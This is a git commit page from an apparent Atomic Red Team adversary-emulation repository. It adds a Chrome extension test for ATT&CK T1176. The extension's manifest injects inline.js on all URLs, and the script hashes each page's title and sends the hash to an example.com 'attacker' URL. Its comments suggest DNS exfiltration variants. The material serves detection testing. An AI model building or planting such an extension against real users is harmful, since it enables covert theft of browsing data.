security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add a 'minimum viable malicious extension' payload + collection notes for Mac

Browse Source
This commit is contained in:
Dan Bourke
2018-02-26 12:46:47 +11:00
parent 797ee54f1a
commit 9d247c281d
3 changed files with 63 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Mac/Collection/Browser_Extensions.md
+10
View File
@@ -0,0 +1,10 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension]
Then click 'Select'
Mac/Payloads/Browser_Extension/inline.js
+37
View File
@@ -0,0 +1,37 @@
function exfil(str) {
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
// and probably a thousand other methods. But this one is easy.
var buffer = new TextEncoder("utf-8").encode(str);
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
function callUrl(buffer) {
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
// except it's example.com so w/e
var digest = hex(buffer);
var url = "https://example.com/" + digest;
console.log("Exfiltrating data to " + url)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", url, true);
xmlHttp.send( null);
return digest;
}
function hex(buffer) {
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
var hexCodes = [];
var view = new DataView(buffer);
for (var i = 0; i < view.byteLength; i += 4) {
var value = view.getUint32(i)
var stringValue = value.toString(16)
var padding = '00000000'
var paddedValue = (padding + stringValue).slice(-padding.length)
hexCodes.push(paddedValue);
}
var athing = hexCodes.join("");
return hexCodes.join("");
}
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);
Mac/Payloads/Browser_Extension/manifest.json
+16
View File
@@ -0,0 +1,16 @@
{
"name": "Minimum Viable Malicious Extension",
"description": "Base Level Extension",
"version": "1.0",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": [
"inline.js"
]
}
]
}